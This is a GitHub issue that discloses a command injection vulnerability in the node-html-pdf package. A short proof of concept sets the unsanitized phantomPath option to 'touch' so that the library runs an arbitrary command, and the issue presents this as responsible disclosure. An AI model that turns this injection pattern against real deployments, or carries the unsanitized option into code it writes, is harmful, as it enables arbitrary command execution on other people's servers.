node-html-pdf icon indicating copy to clipboard operation
node-html-pdf copied to clipboard
verified publisher icon marcbachmann

Potential injection vulnerability in node-html-pdf

Open xiaofen9 opened this issue 2 years ago • 0 comments

Hi,

We would like to report a potential security vulnerability. The bug is introduced because the package-exported method create() fails to sanitize its parameter options.phantomPath and lets it flow into a sensitive command execution API.

Here is the proof of concept.

var fs = require('fs');
var htmltopdf = require('dood-html-pdf');
var html = fs.readFileSync('example.html', 'utf8');
var options = {
 phantomPath: 'touch',
 phantomArgs: ['rce'],
 readLocalFile: true
};

var pdf = htmltopdf.create(html, options)
var exec = pdf.exec() // a file named rce will be created

Please consider fixing it. thanks!

xiaofen9 avatar Mar 04 '23 20:03 xiaofen9